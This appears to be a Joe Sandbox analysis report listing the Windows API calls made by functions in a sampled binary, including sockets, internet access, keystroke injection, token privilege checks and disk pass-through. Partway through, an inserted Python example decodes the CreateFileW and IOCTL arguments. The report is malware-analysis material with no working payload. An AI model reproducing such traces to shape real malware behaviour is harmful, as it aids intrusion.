                    • Opcode ID: 4baec7bdc5941da1ea6311ce42fb5f3eafff80d237c98da32783e8cbf52104be
                    • Instruction ID: 78db568a27a273ffe0e2427361bf6ea3841adc8241fb629f99f7a2002e2afb96
                    • Opcode Fuzzy Hash: 4baec7bdc5941da1ea6311ce42fb5f3eafff80d237c98da32783e8cbf52104be
                    • Instruction Fuzzy Hash: 3251B870E087019ADB70AF65D891A79B3E7AF48310F24881FF956CB3D1EB7098419B5A
                    APIs
                    • GetWindowRect.USER32(00CDE570,?), ref: 00709AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 00709B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00709B72
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 4c857681d87f1b48971937957fc2baba77f2aa392acafcf35bacd2c21ca1b381
                    • Instruction ID: fc1dc691c7c2eca2d48c77fc2bc10a0b79037be3f5e296515c7a2550f258bbee
                    • Opcode Fuzzy Hash: 4c857681d87f1b48971937957fc2baba77f2aa392acafcf35bacd2c21ca1b381
                    • Instruction Fuzzy Hash: 56512C74A00209EFCF20DF68D8809AE7BF6FB55324F108269F9159B291D738AD81CB90
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 006F6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6CF4
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006F6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6D64
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: 696fbefbd2cd1150e6264a89b0d899cef62db9ab70de92dfa57c9f334584f573
                    • Instruction ID: a6af897282b6afecf7219f5fe4ec3b6190a48e3dd567e73f631c76258f414f99
                    • Opcode Fuzzy Hash: 696fbefbd2cd1150e6264a89b0d899cef62db9ab70de92dfa57c9f334584f573
                    • Instruction Fuzzy Hash: 9941A374740200AFEB60BF24DC86F7A77E69F08B10F48811CFA59AB3D2DA759C018795
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0070F910), ref: 006F67BA
                    • _strlen.LIBCMT ref: 006F67EC
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: 653d2c213f9ed1ea54c0c3844e7de7665ecff3894fc3ca568545453321f12793
                    • Instruction ID: 2e73dfe2d364ec724a90637ea96caf418f9c8a8ccece0fbe772310e4a1ba16ff
                    • Opcode Fuzzy Hash: 653d2c213f9ed1ea54c0c3844e7de7665ecff3894fc3ca568545453321f12793
                    • Instruction Fuzzy Hash: DB419335A00108AFCB54FB64DCC5FBEB3AAAF45354F14826DF92697292DB30AD01CB64
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006EBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 006EBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006EBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006EBB80
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 631641dd86d09a8452513b8c633f16d9b6f8d45e63f5ba76e9a9c565283c9d8e
                    • Instruction ID: c2b420fc16e14849c1836c138e8cbd946b0f772f13ee287d6169efd9054ed734
                    • Opcode Fuzzy Hash: 631641dd86d09a8452513b8c633f16d9b6f8d45e63f5ba76e9a9c565283c9d8e
                    • Instruction Fuzzy Hash: F8411A39200650DFCF21EF55C585A6EBBE2EF49310B198598EC4A9B762CB34FD01CBA5
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00708B4D
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 9f81ac8dbbdb0b751ebc019b321774f400e3a995155b03f70dd10ed6c21b9cfb
                    • Instruction ID: a5df20647e8351cdf86ec3a398e627eeb2f6fe14f7496cfa5a94cf312fcfe6f5
                    • Opcode Fuzzy Hash: 9f81ac8dbbdb0b751ebc019b321774f400e3a995155b03f70dd10ed6c21b9cfb
                    • Instruction Fuzzy Hash: 8531C1F4600204FEEBA09A18CC45FA93BE5EB06324F248716FA91D66E1DF38A9409757
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 0070AE1A
                    • GetWindowRect.USER32(?,?), ref: 0070AE90
                    • PtInRect.USER32(?,?,0070C304), ref: 0070AEA0
                    • MessageBeep.USER32(00000000), ref: 0070AF11
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: dac34328ae32d77bb489886aabbc10c9e3dd76653599043ba775c8ea014aff15
                    • Instruction ID: 157b5e68a71602a8076adc93bcb23d7859bf6b109b009b9e565df24b8d9a427f
                    • Opcode Fuzzy Hash: dac34328ae32d77bb489886aabbc10c9e3dd76653599043ba775c8ea014aff15
                    • Instruction Fuzzy Hash: 1A418E74600319EFCB11CF58C885BA97BF5FB4A350F2882A9E814CB291D739E841DF52
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006E1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 006E1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006E10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006E110B
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 959a6e176d6c8bc6cfa68b001d1a323c43e2ee1472662cd184c4f4334e8647a8
                    • Instruction ID: b3f506f4f9e0a2fb0dab049f7235a612acd9cce4cddbf4b2a617f9b320717b35
                    • Opcode Fuzzy Hash: 959a6e176d6c8bc6cfa68b001d1a323c43e2ee1472662cd184c4f4334e8647a8
                    • Instruction Fuzzy Hash: 5D316B30E427C8AEFF308B678C05BF9BBABAB46310F04431AE5905A2D0CB7449D5A765
                    APIs
                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006E1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 006E1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 006E11F1
                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 006E1243
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: df0c2a686fcb2c2c38788ab72d0c1c768f4cb5ee30ba3fc75fb4f0a0d57ac4a7
                    • Instruction ID: 18344a0df82e832b32a5497acd1c529bf6e7b8ed43976f08a699456a6dc53bb4
                    • Opcode Fuzzy Hash: df0c2a686fcb2c2c38788ab72d0c1c768f4cb5ee30ba3fc75fb4f0a0d57ac4a7
                    • Instruction Fuzzy Hash: E9316B30A413889EFF308A678C047FA7BABAB4A310F04431EE2919A6D1C3754A95A755
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006B644B
                    • __isleadbyte_l.LIBCMT ref: 006B6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006B64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006B64DD
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 71d32ef9537442f04af8cf99e88032ff7011b4035254803155f98661b59a594e
                    • Instruction ID: 964b945cbd28e37b5941f6371739c310852d2eec024794a11f88c708b740f1d5
                    • Opcode Fuzzy Hash: 71d32ef9537442f04af8cf99e88032ff7011b4035254803155f98661b59a594e
                    • Instruction Fuzzy Hash: 9831DEB160064AEFDB21CF64C844BEA7BE6FF41310F158429F854872A1EB39D891DB90
                    APIs
                    • GetForegroundWindow.USER32 ref: 00705189
                      • Part of subcall function 006E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006E3897
                      • Part of subcall function 006E387D: GetCurrentThreadId.KERNEL32 ref: 006E389E
                      • Part of subcall function 006E387D: AttachThreadInput.USER32(00000000,?,006E52A7), ref: 006E38A5
                    • GetCaretPos.USER32(?), ref: 0070519A
                    • ClientToScreen.USER32(00000000,?), ref: 007051D5
                    • GetForegroundWindow.USER32 ref: 007051DB
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: e5e13f4a8ed9c785ead653320bf65ef32636148dbf29cccf4750c29c85def9b1
                    • Instruction ID: f3c80057c923de129a1a1d836d956f5ef74ca49a0dd869b9fcf93e5a6906dfbc
                    • Opcode Fuzzy Hash: e5e13f4a8ed9c785ead653320bf65ef32636148dbf29cccf4750c29c85def9b1
                    • Instruction Fuzzy Hash: 7D314D71900108AFCB50EFA5C885AEFB7FAEF98304F14416AE406E7241EA759E00CBA4
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • GetCursorPos.USER32(?), ref: 0070C7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006BBBFB,?,?,?,?,?), ref: 0070C7D7
                    • GetCursorPos.USER32(?), ref: 0070C824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006BBBFB,?,?,?), ref: 0070C85E
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 44fce5c17184fc6d5f06aaebf1713c0b6c841715d57deb980d9bd58be8655e5f
                    • Instruction ID: 8645abdb43b2e5e2b36cd32964d2ac65682c1138cc9ee28d1b27e45c623f0b54
                    • Opcode Fuzzy Hash: 44fce5c17184fc6d5f06aaebf1713c0b6c841715d57deb980d9bd58be8655e5f
                    • Instruction Fuzzy Hash: 20317335500018EFCB26CF58CC98EEA7BFAEB4A710F048269F9058B2A1D7795D50DB69
                    APIs
                    • __setmode.LIBCMT ref: 006A0BF2
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006E7B20,?,?,00000000), ref: 00685B8C
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006E7B20,?,?,00000000,?,?), ref: 00685BB0
                    • _fprintf.LIBCMT ref: 006A0C29
                    • OutputDebugStringW.KERNEL32(?), ref: 006D6331
                      • Part of subcall function 006A4CDA: _flsall.LIBCMT ref: 006A4CF3
                    • __setmode.LIBCMT ref: 006A0C5E
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 8800403e12188f41e2234cfae2eedf2af2f0b28aa37f6b35410f144dbab7216a
                    • Instruction ID: 2d01771947002b27b3877ba6dd2cf80a459d7f6c80dd16e9b698f5cd5fc093b1
                    • Opcode Fuzzy Hash: 8800403e12188f41e2234cfae2eedf2af2f0b28aa37f6b35410f144dbab7216a
                    • Instruction Fuzzy Hash: D11127319042047FDB44B7B89C439BE7B6B9F86320F14421EF20557282DFB15D424BA9
                    APIs
                      • Part of subcall function 006D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006D8669
                      • Part of subcall function 006D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006D8673
                      • Part of subcall function 006D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8682
                      • Part of subcall function 006D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8689
                      • Part of subcall function 006D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006D8BEB
                    • _memcmp.LIBCMT ref: 006D8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D8C44
                    • HeapFree.KERNEL32(00000000), ref: 006D8C4B
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 548c2b6ac3a20038b22be9c022c4024cfd7fa08868f2ab74aa8490dd78d44695
                    • Instruction ID: 8cbe0957886cd92476739f7dad57b992965c3232df23f6aff553a4f015aa5606
                    • Opcode Fuzzy Hash: 548c2b6ac3a20038b22be9c022c4024cfd7fa08868f2ab74aa8490dd78d44695
                    • Instruction Fuzzy Hash: FA219D71E11208EFDB10DFA4C949BEEB7B9EF44354F14809AE454AB340EB35AE06CB60
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006F1A97
                      • Part of subcall function 006F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006F1B40
                      • Part of subcall function 006F1B21: InternetCloseHandle.WININET(00000000), ref: 006F1BDD
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 7d9855c9491ae1816efa9474e30fe5e4a3fc580db80cf19a3e061b99120e844f
                    • Instruction ID: df2359abc1d233b03d36fd0529878e19f1497dfdfbe4ed726ad4fda9bd819012
                    • Opcode Fuzzy Hash: 7d9855c9491ae1816efa9474e30fe5e4a3fc580db80cf19a3e061b99120e844f
                    • Instruction Fuzzy Hash: EC21A135200609FFDB229F608C01FBBB7AEFF85741F10411AFB119A651EB71D8119BA5
                    APIs
                      • Part of subcall function 006DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006DE1C4,?,?,?,006DEFB7,00000000,000000EF,00000119,?,?), ref: 006DF5BC
                      • Part of subcall function 006DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 006DF5E2
                      • Part of subcall function 006DF5AD: lstrcmpiW.KERNEL32(00000000,?,006DE1C4,?,?,?,006DEFB7,00000000,000000EF,00000119,?,?), ref: 006DF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,006DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006DE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 006DE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,006DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006DE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 2775b7ee8b28125b7c4a7de4a00934605bd6f7bd0b567ebbfe83a8fa234cd71d
                    • Instruction ID: e70cd1068c39f2ced0ee3c307aba1c46f6c008758dd0e15ca43894b3fb9c5600
                    • Opcode Fuzzy Hash: 2775b7ee8b28125b7c4a7de4a00934605bd6f7bd0b567ebbfe83a8fa234cd71d
                    • Instruction Fuzzy Hash: 6711AF36500205EFCB25AF64DC45D7A77BAFF45350B40812BE806CB350EB729951C7A4
                    APIs
                    • _free.LIBCMT ref: 006B5351
                      • Part of subcall function 006A594C: __FF_MSGBANNER.LIBCMT ref: 006A5963
                      • Part of subcall function 006A594C: __NMSG_WRITE.LIBCMT ref: 006A596A
                      • Part of subcall function 006A594C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000000,?,?,?,006A1013,?), ref: 006A598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 19a2e97a8996408cf8d220e4ac3cf4ee156d4c5b1aa6e7bdb0c59c4a517a8288
                    • Instruction ID: 6321f05a1998e6c81d41aa03f4c81b8366afdf431f6228f10e82f3be7d963d6b
                    • Opcode Fuzzy Hash: 19a2e97a8996408cf8d220e4ac3cf4ee156d4c5b1aa6e7bdb0c59c4a517a8288
                    • Instruction Fuzzy Hash: 71110872404A159ECF303F74AC057DD37D65F023A0B10452EF60696391EFB58D819B58
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006E40D1
                    • _memset.LIBCMT ref: 006E40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006E4144
                    • CloseHandle.KERNEL32(00000000), ref: 006E414D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    • Opcode ID: f8f323a02c4e184c448f60bfd403648c4a666e69257312eb91cc863955235b76
                    • Instruction ID: cc06661a4e85d9f9df4fc775638364cd24d7f2ece377390496725d85dad3c5a7
                    • Opcode Fuzzy Hash: f8f323a02c4e184c448f60bfd403648c4a666e69257312eb91cc863955235b76
                    • Instruction Fuzzy Hash: AC11AB75901328BAD7309BB59C4DFEBBB7CEF45760F1042AAF908D7280D6744E808BA4
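The record above opens a handle with CreateFileW(..., C0000000, 00000003, 00000000, 00000003, 00000080, 00000000) and then issues DeviceIoControl with control code 0004D02C and 0x200-byte input and output buffers. The Python below is an added editorial example, not part of the Joe Sandbox report and not code from the analysed sample: it unpacks both argument sets using the CTL_CODE field layout from winioctl.h (DeviceType << 16 | Access << 14 | Function << 2 | Method), so an unfamiliar control code is still decoded field by field. The small IOCTL table is rebuilt from SDK definitions (IOCTL_SCSI_BASE is FILE_DEVICE_CONTROLLER, 0x04); the report does not say what the runtime uses the ATA pass-through call for, and the example does not guess.

```python
"""Decode the CreateFileW and DeviceIoControl arguments listed in the record
above: CreateFileW(..., C0000000, 3, 0, 3, 80, 0) followed by
DeviceIoControl(h, 0004D02C, in, 200, out, 200, ...).

An IOCTL is packed by the CTL_CODE() macro in winioctl.h as
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
so the fields can be split back out even when the constant is not in a table.
"""
from dataclasses import dataclass
from typing import Optional


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Same packing as the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER", 0x07: "FILE_DEVICE_DISK",
                0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
RW = 3  # FILE_READ_ACCESS | FILE_WRITE_ACCESS

# A few SDK constants rebuilt from their definitions (ntddscsi.h / winioctl.h).
# Extend as needed; codes missing here are still decoded field by field.
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x0401, 0, RW): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x0402, 0, RW): "IOCTL_SCSI_MINIPORT",
    ctl_code(0x04, 0x0405, 0, RW): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x040B, 0, RW): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x04, 0x040C, 0, RW): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


@dataclass
class DecodedIoctl:
    code: int
    device_type: int
    device_name: str
    function: int
    method: str
    access: str
    name: Optional[str]  # None when the code is not in KNOWN_IOCTLS


def decode_ioctl(code: int) -> DecodedIoctl:
    """Split a 32-bit control code into its CTL_CODE fields."""
    device_type = (code >> 16) & 0xFFFF
    return DecodedIoctl(
        code=code,
        device_type=device_type,
        device_name=DEVICE_TYPES.get(device_type, f"0x{device_type:X}"),
        function=(code >> 2) & 0xFFF,
        method=METHODS[code & 0x3],
        access=ACCESS[(code >> 14) & 0x3],
        name=KNOWN_IOCTLS.get(code),
    )


# CreateFileW argument tables (values from the Windows SDK headers).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
               0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def flag_names(value: int, table: dict) -> str:
    """Expand a bitmask into '|'-joined names; bits with no name stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) or "0"


def decode_createfile(access: int, share: int, disposition: int, flags: int) -> dict:
    """Name the dwDesiredAccess, dwShareMode, dwCreationDisposition and
    dwFlagsAndAttributes arguments of a CreateFileW call."""
    return {
        "access": flag_names(access, GENERIC),
        "share": flag_names(share, SHARE),
        "disposition": DISPOSITION.get(disposition, f"0x{disposition:X}"),
        "flags": flag_names(flags, FLAGS_ATTRS),
    }


if __name__ == "__main__":
    # The two calls from the record above.
    print(decode_createfile(0xC0000000, 0x3, 0x3, 0x80))
    print(decode_ioctl(0x0004D02C))
```

Run stand-alone it prints the decoded CreateFileW arguments (read/write access, read/write sharing, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL) and resolves 0004D02C to IOCTL_ATA_PASS_THROUGH on FILE_DEVICE_CONTROLLER with METHOD_BUFFERED. The same decoder applies to any DeviceIoControl line in this report; only the lookup table needs extending.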
                    APIs
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006E7B20,?,?,00000000), ref: 00685B8C
                      • Part of subcall function 00685B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006E7B20,?,?,00000000,?,?), ref: 00685BB0
                    • gethostbyname.WSOCK32(?,?,?), ref: 006F66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F66B7
                    • _memmove.LIBCMT ref: 006F66E4
                    • inet_ntoa.WSOCK32(?), ref: 006F66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 60a2a532f4ffcbc02b147724ffd65f5a07dea653600b3ab10c7f39ee5a1f532e
                    • Instruction ID: 5bbbcdbd3c71078f75fa9438fdebde9f0a0c82a43cec5f347f8952258011c5a7
                    • Opcode Fuzzy Hash: 60a2a532f4ffcbc02b147724ffd65f5a07dea653600b3ab10c7f39ee5a1f532e
                    • Instruction Fuzzy Hash: F9116335500508AFCB44FBA4DD96DEE77BABF14310B148269F502A72A1DF30AE04CB65
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006D9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006D9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006D906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006D9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 3bb98031a7d78166e4b15215305db3f8e62e8ca20ba65e8a708bc41ad3e47a48
                    • Instruction ID: d372341f52c0bbb3d1acbf4427ab816edd8c4b8d84e57f47d9b9ecc16be7022f
                    • Opcode Fuzzy Hash: 3bb98031a7d78166e4b15215305db3f8e62e8ca20ba65e8a708bc41ad3e47a48
                    • Instruction Fuzzy Hash: 07114C79D00218FFDB10DFA5C884E9DBB75FB48310F204196E904B7350D6726E11DBA4
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 006812D8
                    • GetClientRect.USER32(?,?), ref: 006BB84B
                    • GetCursorPos.USER32(?), ref: 006BB855
                    • ScreenToClient.USER32(?,?), ref: 006BB860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: cc6dc2a04af1e44a93a6e77215c8445a7cfa484262744620b9f650154e139a3e
                    • Instruction ID: 87034f1b7c73db2bc2f8959351c771f9a32484402a92f469263f3240522d7d82
                    • Opcode Fuzzy Hash: cc6dc2a04af1e44a93a6e77215c8445a7cfa484262744620b9f650154e139a3e
